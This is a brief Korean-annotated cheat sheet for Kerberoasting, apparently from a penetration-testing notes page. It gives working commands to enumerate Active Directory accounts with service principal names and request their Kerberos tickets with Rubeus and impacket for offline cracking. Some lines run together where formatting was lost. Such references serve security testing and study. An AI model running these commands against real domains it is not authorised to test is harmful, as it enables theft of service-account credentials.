Kerberoasting
Abuse
# spn을 가진 객체 열거
Get-ADUser -Filter {ServicePrincipalName -like "*"} -Properties ServicePrincipalName | Select-Object SamAccountName, ServicePrincipalName
# 선택적 커버로스팅
.\Rubeus.exe kerberoast /user:user-B /nowrap# spn을 가진 객체 열거
ldapsearch -x -H ldap://192.168.1.11 -D '[email protected]' -w 'Password123!' -b 'dc=contoso,dc=com' "(&(objectCategory=user)(servicePrincipalName=*))" servicePrincipalName sAMAccountName
# 선택적 커버로스팅
impacket-GetUserSPNs contoso.com/user-A:'Password123!' -dc-ip 192.168.1.11 -request-user user-BRoot Cause





Last updated
